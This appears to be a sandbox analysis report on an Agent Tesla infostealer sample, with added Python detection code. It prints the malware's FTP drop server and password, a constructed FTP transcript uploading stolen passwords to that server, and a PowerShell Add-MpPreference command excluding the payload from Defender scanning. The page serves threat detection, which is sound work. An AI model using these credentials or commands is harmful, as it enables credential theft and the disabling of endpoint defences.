General

  • Target

    Payment.Gz.gz

  • Size

    605KB

  • Sample

    240917-mjt29sybmp

  • MD5

    4273fb6daefbb4d0770c059c363cc3d8

  • SHA1

    5d68193d6b37f7e203a301c201778427874f2659

  • SHA256

    f0ac2705080490731369ac9d44c707b2a48e4b799a48d06b6d3c904a463cdf50

  • SHA512

    1fd4ce1c31bbfe3e5b87ff96bf5537fbecdede29c91e3d0ae22aa7ab28561c78aa59ed5c06bf32ac033b90973ae2fa7716ffb5f21acf3a2c4f75415989ca26db

  • SSDEEP

    12288:8rhjwZ3XvmNQNqW4lX0p69v+fjsBCLoR4IvNAf2+gUDxr:8uWOiYJo683vyKUNr

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    u;4z3V.Iir1l
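
The extracted configuration above is only useful once it is turned into something that can be matched against traffic. The following Python is an added example (not part of the Triage report or of the Agent Tesla code) that parses the config block as printed on this page and then flags an FTP control-channel session that logs in to the configured drop server. The username is shown redacted on the page, so the matcher keys on host, port and password only; the two FTP transcripts, the `placeholder-account` username and the uploaded file name are constructed for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Extracted-config block copied from the report above. The username is shown
# redacted on the page, so matching below keys on host, port and password.
REPORT_CONFIG = """\
Family
agenttesla
Credentials
  • Protocol:
    ftp
  • Host:
    ftp://ftp.fosna.net
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    u;4z3V.Iir1l
"""


def parse_config(text: str) -> dict:
    """Flatten the report's 'Key:' / value bullet pairs into a dict."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    cfg = {}
    for i, line in enumerate(lines[:-1]):
        if line == "Family":
            cfg["family"] = lines[i + 1]
            continue
        m = re.fullmatch(r"[•\s]*([A-Za-z]+):", line)
        if m:
            cfg[m.group(1).lower()] = lines[i + 1]
    # "ftp://host" -> bare hostname, which is what a flow record carries
    cfg["hostname"] = re.sub(r"^[a-z]+://", "", cfg.get("host", "")).rstrip("/")
    return cfg


@dataclass
class ExfilFinding:
    matched_on: list = field(default_factory=list)    # config fields that matched
    stored_files: list = field(default_factory=list)  # names uploaded via STOR/APPE
    logged_in: bool = False


def match_ftp_session(cfg: dict, session: dict) -> Optional[ExfilFinding]:
    """Flag an FTP control-channel session that talks to the configured drop
    server. Host or password seen counts as a match; port alone is too weak."""
    f = ExfilFinding()
    if session["dst_host"].lower() == cfg["hostname"].lower():
        f.matched_on.append("host")
    if str(session["dst_port"]) == cfg.get("port"):
        f.matched_on.append("port")
    for line in session["lines"]:
        side, _, payload = line.partition(": ")
        if side == "S":
            if payload.startswith("230"):       # 230 = login successful
                f.logged_in = True
            continue
        verb, _, arg = payload.partition(" ")
        if verb.upper() == "PASS" and arg == cfg.get("password"):
            f.matched_on.append("password")
        elif verb.upper() in ("STOR", "APPE"):  # uploads are the exfiltration
            f.stored_files.append(arg)
    strong = {"host", "password"} & set(f.matched_on)
    return f if strong else None


# Constructed control-channel transcripts (C: = client, S: = server). The USER
# argument is a placeholder; the upload name only mimics a stolen-password report.
EXFIL_SESSION = {
    "dst_host": "ftp.fosna.net", "dst_port": 21,
    "lines": [
        "S: 220 FTP server ready",
        "C: USER placeholder-account",
        "S: 331 Password required",
        "C: PASS u;4z3V.Iir1l",
        "S: 230 User logged in",
        "C: TYPE I",
        "S: 200 Type set to I",
        "C: PASV",
        "S: 227 Entering Passive Mode (203,0,113,10,195,80)",
        "C: STOR PW_victim-DESKTOP-AB12_2024_09_17_10_42_01.html",
        "S: 150 Opening BINARY mode data connection",
        "S: 226 Transfer complete",
        "C: QUIT",
    ],
}
BENIGN_SESSION = {
    "dst_host": "ftp.example.com", "dst_port": 21,
    "lines": ["S: 220 ready", "C: USER alice", "S: 331 ok",
              "C: PASS hunter2", "S: 230 ok", "C: STOR report.pdf", "S: 226 ok"],
}

if __name__ == "__main__":
    cfg = parse_config(REPORT_CONFIG)
    print(cfg["family"], cfg["hostname"], cfg["port"])
    print(match_ftp_session(cfg, EXFIL_SESSION))
    print(match_ftp_session(cfg, BENIGN_SESSION))
```

Because Agent Tesla's FTP exfiltration is plaintext, the password from the extracted config is a stronger network indicator than the hostname: the operator can re-point DNS, but every infected host will send the same `PASS` line until the build is changed.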

Targets

    • Target

      Paymet.exe

    • Size

      2.5MB

    • MD5

      2fd029782f709559adefb235eedbd093

    • SHA1

      677219bbd0ab70938a2a658b336418df69c9bb15

    • SHA256

      fe03eaf28bc8911f525983a47431e8e4d338a8abc7f2c7833596480ea5eddb02

    • SHA512

      c86032f2060a89e82ee32549612d5004d10d23010f3e7647821bac25a05340a381f7e0355be63d8ff7f8ccd4d26a2605dcda3e114bd3471e2497410f6b7e029d

    • SSDEEP

      12288:fHPEAmDrpKPtlUM7X1dsUxawC66IHn4Ks6axdNFAzE8l1+/bU5G7AOsS7o:fHPHDUujFC66ge5FMRl1dG7eS7o

    • AgentTesla

      Agent Tesla is a .NET-based remote access trojan and information stealer, originally written in Visual Basic .NET. It harvests saved credentials, keystrokes and clipboard contents and exfiltrates them over channels such as FTP (as in the extracted configuration above) or SMTP.

    • UAC bypass

    • Windows security bypass

    • Credentials from Password Stores: Credentials from Web Browsers

      Malicious access to, or copying of, a web browser credential store.

    • Looks for VirtualBox Guest Additions in registry

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes (typically via Add-MpPreference) so that the payload is not scanned.

    • Looks for VMWare Tools registry key

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up the country code configured in the registry, most likely to geofence execution to or away from particular regions.

    • Windows security modification

    • Checks whether UAC is enabled

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP address.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext
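
The behaviours listed above are what a sandbox's API hooks see, and a practitioner reproducing this report's verdict needs the same checks expressed as rules. The Python below is an added example, not Triage's signature code and not anything from the sample: it runs a small rule set over a constructed API trace and labels each event with the signature name used on this page. The registry paths are the keys commonly read for each check (VirtualBox Guest Additions, VMware Tools, the BIOS description key, the Geo\Nation value, EnableLUA and Disk\Enum); they were not recorded from this sample. The pids and the PowerShell command line are placeholders.

```python
import re

# Constructed sandbox API trace, one dict per hooked call. The registry paths
# are the keys commonly read for each check named above; pids and the
# PowerShell command line are placeholders.
TRACE = [
    {"api": "RegOpenKeyExW", "path": r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"},
    {"api": "RegOpenKeyExW", "path": r"HKLM\SOFTWARE\VMware, Inc.\VMware Tools"},
    {"api": "RegQueryValueExW", "path": r"HKLM\HARDWARE\DESCRIPTION\System\BIOS",
     "value": "SystemManufacturer"},
    {"api": "RegQueryValueExW", "path": r"HKCU\Control Panel\International\Geo",
     "value": "Nation"},
    {"api": "RegQueryValueExW",
     "path": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "value": "EnableLUA"},
    {"api": "RegQueryValueExW", "path": r"HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum",
     "value": "0"},
    {"api": "CreateProcessW", "cmdline": "powershell.exe -NoProfile -Command Add-MpPreference "
     "-ExclusionPath C:\\Users\\Public -ExclusionExtension exe -ExclusionProcess Paymet.exe"},
    # pid = calling process, target_pid = process owning the thread being modified
    {"api": "SetThreadContext", "pid": 3000, "target_pid": 4120},
]


def reg_hit(ev, key_tail, value=None):
    """True when a registry call touches a key ending in key_tail (and, if
    given, reads the named value). Key matching is case-insensitive."""
    if not ev["api"].startswith("Reg"):
        return False
    if not ev["path"].lower().endswith(key_tail.lower()):
        return False
    return value is None or ev.get("value", "").lower() == value.lower()


EXCLUSION_RE = re.compile(r"-Exclusion(Path|Extension|Process)\s+(\S+)", re.I)


def defender_exclusions(cmdline):
    """Pull Add-MpPreference exclusions out of a command line as
    {kind: value}; empty when the cmdlet is absent."""
    if not re.search(r"\bAdd-MpPreference\b", cmdline, re.I):
        return {}
    return {kind: val for kind, val in EXCLUSION_RE.findall(cmdline)}


RULES = [
    ("Looks for VirtualBox Guest Additions in registry",
     lambda e: reg_hit(e, r"\Oracle\VirtualBox Guest Additions")),
    ("Looks for VMWare Tools registry key",
     lambda e: reg_hit(e, r"\VMware, Inc.\VMware Tools")),
    ("Checks BIOS information in registry",
     lambda e: reg_hit(e, r"\HARDWARE\DESCRIPTION\System\BIOS")),
    ("Checks computer location settings",
     lambda e: reg_hit(e, r"\Control Panel\International\Geo", "Nation")),
    ("Checks whether UAC is enabled",
     lambda e: reg_hit(e, r"\Policies\System", "EnableLUA")),
    ("Maps connected drives based on registry",
     lambda e: reg_hit(e, r"\Services\Disk\Enum")),
    ("Command and Scripting Interpreter: PowerShell",
     lambda e: e["api"] == "CreateProcessW" and bool(defender_exclusions(e["cmdline"]))),
    # Setting the context of a thread in another process is the classic
    # hollowing / injection step.
    ("Suspicious use of SetThreadContext",
     lambda e: e["api"] == "SetThreadContext" and e["target_pid"] != e["pid"]),
]

VM_CHECKS = {
    "Looks for VirtualBox Guest Additions in registry",
    "Looks for VMWare Tools registry key",
    "Checks BIOS information in registry",
    "Maps connected drives based on registry",
}


def evaluate(trace):
    """Return {signature name: [matching events]} for a trace."""
    hits = {}
    for ev in trace:
        for name, pred in RULES:
            if pred(ev):
                hits.setdefault(name, []).append(ev)
    return hits


def evasion_count(hits):
    """How many distinct sandbox/VM-detection signatures fired."""
    return len(VM_CHECKS & set(hits))


# Constructed benign trace: ordinary registry read, harmless process start,
# and a SetThreadContext on the caller's own thread.
BENIGN_TRACE = [
    {"api": "RegOpenKeyExW", "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"},
    {"api": "CreateProcessW", "cmdline": "notepad.exe C:\\Users\\Public\\notes.txt"},
    {"api": "SetThreadContext", "pid": 3000, "target_pid": 3000},
]

if __name__ == "__main__":
    hits = evaluate(TRACE)
    for name, events in hits.items():
        print(f"{name}: {len(events)} event(s)")
    print("VM-detection signatures:", evasion_count(hits))
```

Note that these registry reads are not captured by Sysmon, which logs value writes and key creation but not queries; reproducing this part of the report outside a sandbox needs an API-hooking or ETW-based source.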

MITRE ATT&CK Enterprise v15

Tasks